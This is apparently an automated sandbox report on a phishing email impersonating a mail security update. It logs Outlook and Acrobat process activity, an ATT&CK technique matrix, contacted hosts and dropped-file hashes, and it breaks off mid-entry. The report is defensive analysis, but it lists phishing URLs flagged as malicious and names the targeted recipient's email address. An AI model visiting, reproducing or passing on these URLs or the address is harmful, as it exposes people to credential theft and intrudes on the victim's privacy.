    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Process Injection
    LSASS Memory1
    File and Directory Discovery
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Deobfuscate/Decode Files or Information
    Security Account Manager14
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      google.com
      142.251.36.78
      truefalse
        unknown
        infinitipulsarjoy.ru
        188.114.97.3
        truetrue
          unknown
          code.jquery.com
          151.101.194.137
          truefalse
            unknown
            plus.l.google.com
            172.217.16.206
            truefalse
              unknown
              play.google.com
              172.253.124.101
              truefalse
                unknown
                cdnjs.cloudflare.com
                104.17.25.14
                truefalse
                  unknown
                  challenges.cloudflare.com
                  104.18.94.41
                  truefalse
                    unknown
                    pulsecortexe.space
                    188.114.96.3
                    truefalse
                      unknown
                      www.google.com
                      142.250.185.68
                      truefalse
                        unknown
                        umeleoplodnenie.com
                        162.0.217.108
                        truefalse
                          unknown
                          e-fukuyoshi.com
                          unknown
                          unknownfalse
                            unknown
                            assets.onestore.ms
                            unknown
                            unknownfalse
                              unknown
                              i.s-microsoft.com
                              unknown
                              unknownfalse
                                unknown
                                ajax.aspnetcdn.com
                                unknown
                                unknownfalse
                                  unknown
                                  c.s-microsoft.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    apis.google.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29ttrue
                                        unknown
                                        https://umeleoplodnenie.com/.well-known/tvavx.phptrue
                                          unknown
                                          https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29ttrue
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            172.253.124.101
                                            play.google.comUnited States
                                            15169GOOGLEUSfalse
                                            162.0.217.108
                                            umeleoplodnenie.comCanada
                                            35893ACPCAfalse
                                            152.199.19.160
                                            unknownUnited States
                                            15133EDGECASTUSfalse
                                            184.28.88.176
                                            unknownUnited States
                                            16625AKAMAI-ASUSfalse
                                            95.101.54.195
                                            unknownEuropean Union
                                            34164AKAMAI-LONGBfalse
                                            104.18.94.41
                                            challenges.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            173.194.76.84
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            54.227.187.23
                                            unknownUnited States
                                            14618AMAZON-AESUSfalse
                                            8.8.8.8
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            52.109.68.129
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            184.28.89.233
                                            unknownUnited States
                                            16625AKAMAI-ASUSfalse
                                            2.19.126.141
                                            unknownEuropean Union
                                            16625AKAMAI-ASUSfalse
                                            52.109.32.97
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            23.192.243.7
                                            unknownUnited States
                                            16625AKAMAI-ASUSfalse
                                            35.190.80.1
                                            a.nel.cloudflare.comUnited States
                                            15169GOOGLEUSfalse
                                            151.101.194.137
                                            code.jquery.comUnited States
                                            54113FASTLYUSfalse
                                            172.217.18.99
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            172.64.41.3
                                            unknownUnited States
                                            13335CLOUDFLARENETUSfalse
                                            142.250.186.99
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            52.113.194.132
                                            unknownUnited States
                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            142.250.186.78
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            142.250.185.68
                                            www.google.comUnited States
                                            15169GOOGLEUSfalse
                                            1.1.1.1
                                            unknownAustralia
                                            13335CLOUDFLARENETUSfalse
                                            172.217.16.206
                                            plus.l.google.comUnited States
                                            15169GOOGLEUSfalse
                                            52.109.68.130
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            104.18.95.41
                                            unknownUnited States
                                            13335CLOUDFLARENETUSfalse
                                            23.45.150.50
                                            unknownUnited States
                                            9498BBIL-APBHARTIAirtelLtdINfalse
                                            104.115.89.196
                                            unknownUnited States
                                            16625AKAMAI-ASUSfalse
                                            151.101.2.137
                                            unknownUnited States
                                            54113FASTLYUSfalse
                                            2.19.126.155
                                            unknownEuropean Union
                                            16625AKAMAI-ASUSfalse
                                            142.250.186.106
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            93.184.221.240
                                            unknownEuropean Union
                                            15133EDGECASTUSfalse
                                            88.221.169.152
                                            unknownEuropean Union
                                            16625AKAMAI-ASUSfalse
                                            104.78.188.188
                                            unknownUnited States
                                            16625AKAMAI-ASUSfalse
                                            2.19.126.151
                                            unknownEuropean Union
                                            16625AKAMAI-ASUSfalse
                                            239.255.255.250
                                            unknownReserved
                                            unknownunknownfalse
                                            188.114.97.3
                                            infinitipulsarjoy.ruEuropean Union
                                            13335CLOUDFLARENETUStrue
                                            188.114.96.3
                                            pulsecortexe.spaceEuropean Union
                                            13335CLOUDFLARENETUSfalse
                                            142.250.9.100
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            108.177.122.94
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            74.125.136.113
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            104.17.25.14
                                            cdnjs.cloudflare.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            20.44.10.122
                                            unknownUnited States
                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            IP
                                            192.168.2.16
                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1499929
                                            Start date and time:2024-08-27 17:54:23 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:27
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • EGA enabled
                                            Analysis Mode:stream
                                            Analysis stop reason:Timeout
                                            Sample name:Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg
                                            Detection:MAL
                                            Classification:mal68.phis.winMSG@64/47@58/275
                                            Cookbook Comments:
                                            • Found application associated with file extension: .msg
                                            • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 52.109.68.129, 2.19.126.151, 2.19.126.160
                                            • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, prod.configsvc1.live.com.akadns.net, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, ukw-azsc-config.officeapps.live.com, omex.cdn.office.net.akamaized.net, europe.configsvc1.live.com.akadns.net, a1864.dscd.akamai.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetValueKey calls found.
                                            • VT rate limit hit for: Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):403
                                            Entropy (8bit):4.957668776649849
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:DD21DA05353DB3CF401A03725A8900F5
                                            SHA1:C64AF05BB21CAE06C1048FCBE02ACFAF961B59B7
                                            SHA-256:095A7EFB02D665482845D2165C036FD8D8CC71718B4CA2D8977B670BED737148
                                            SHA-512:92A4B61704E066454044CD85EEE116612006FACF4BFA05B97F6EB0DCF15E7042CFF6106030A6D40D38D7BD87AB4C344494EBB148D522B135035ADBB91EE517C0
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13369334115248355","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":131661},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):403
                                            Entropy (8bit):4.953858338552356
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:4C313FE514B5F4E7E89329630909F8DC
                                            SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                            SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                            SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):0
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:4C313FE514B5F4E7E89329630909F8DC
                                            SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                            SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                            SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):0
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:4C313FE514B5F4E7E89329630909F8DC
                                            SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                            SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                            SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                            Category:dropped
                                            Size (bytes):65110
                                            Entropy (8bit):0.4933206103022443
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:1718DA607579B509A7BB92B42FD29899
                                            SHA1:BBB8B96D06A1ECFE76DB949AF2E511A2BC4D5012
                                            SHA-256:CBE3FE80F77EB13CEF8157B2BC45A27719A6ABE75509EDD10871DDD24BDC0F6E
                                            SHA-512:E87E177C4FFDD556322C7212CCA186DC792F7E53FCEC811D6D1DF3DF95C50E305F76F20DF966D501995ECF4E1E8F1619D9C4C2A26B5F8EC3FD6E9DCAA12E2CA5
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                            Category:dropped
                                            Size (bytes):57344
                                            Entropy (8bit):3.291927920232006
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                            SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                            SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                            SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite Rollback Journal
                                            Category:dropped
                                            Size (bytes):16928
                                            Entropy (8bit):1.2160291275063093
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:1A6EE3F27B4AC73AFD1B7035806A1D3C
                                            SHA1:18301D09BC5BCEC9D964FE6992550F1283E3691F
                                            SHA-256:2743BB858CCC504B6B486F190F644E03F8A01F1F6E5D3672B4DD11C14942BAED
                                            SHA-512:6B41926AFCF7D1B378B197EA2F71E1D9F52451AE44F61DF0A2F77BEFD43E207E2DC823613C0BB0949C626FAFAD2D7B517431640410EC08CC356BB615A9D255EC
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:.... .c.....*...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                            Category:dropped
                                            Size (bytes):71954
                                            Entropy (8bit):7.996617769952133
                                            Encrypted:true
                                            SSDEEP:
                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):893
                                            Entropy (8bit):7.366016576663508
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                            SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                            SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                            SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):328
                                            Entropy (8bit):3.137989037915285
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:C3A409519457641E378D29AD524D3D7A
                                            SHA1:B5B4E5E3F9B0B4D8BA5BB6277976B8B86CF0577A
                                            SHA-256:88C961262313CD293A92D14F7231AD798EF73479769715939297145B01037A93
                                            SHA-512:B4AB28A5BF57537AD7E28E9D563AA35639B172B4CB35C74BE35283CAA046D71FFAAB061E34D61FAECF376CE926EF02AFE9F32BC7D0435332DDCA5FD8EE874A5B
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:p...... ........{UG.....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):252
                                            Entropy (8bit):3.01099116281767
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:55DFBC2902ADD276F83547B67028A555
                                            SHA1:7C0705F91251E52E293FD6A9B9F33B1E452D5DA2
                                            SHA-256:A653EB736115B5BE1247E06D15425504215CCCC5B02469288BD6955FCF05D754
                                            SHA-512:D48F11F110DAAB58A39C55D41402671D1840B56FF999D277767B1AE0C426A024D07BC1988F6C460B5B968E3BC6942E5DEAB4AC8A68D796C7F47543B9F4EBBE28
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:p...... ....`....c......(....................................................... ........!.M........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.6.0.7.9.b.8.c.0.9.2.9.c.0."...
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:PostScript document text
                                            Category:dropped
                                            Size (bytes):185099
